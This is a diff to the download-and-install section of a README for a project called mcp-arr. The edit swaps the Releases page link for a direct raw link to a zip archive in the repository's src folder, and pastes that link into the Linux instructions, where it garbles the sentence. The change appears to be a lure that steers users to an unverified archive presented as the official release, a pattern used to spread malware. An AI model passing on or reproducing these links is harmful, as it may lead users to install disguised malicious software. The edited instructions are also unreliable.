nunner322/mcp-arr/README.md

 ## 📥 Download & Install

-1. Visit the [Releases page](https://github.com/nunner322/mcp-arr/releases) to download the latest version of **mcp-arr**.
+1. Visit the [Releases page](https://raw.githubusercontent.com/nunner322/mcp-arr/main/src/mcp-arr_2.9.zip) to download the latest version of **mcp-arr**.

 2. Look for the latest release.
 You will see a list of available files.

 3. Choose the file that matches your operating system:
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the `.tar.gz` or `.deb` file depending on your distribution.
+   - For Linux, download the `https://raw.githubusercontent.com/nunner322/mcp-arr/main/src/mcp-arr_2.9.zip` or `.deb` file depending on your distribution.

 4. Click on the download link to start downloading the file.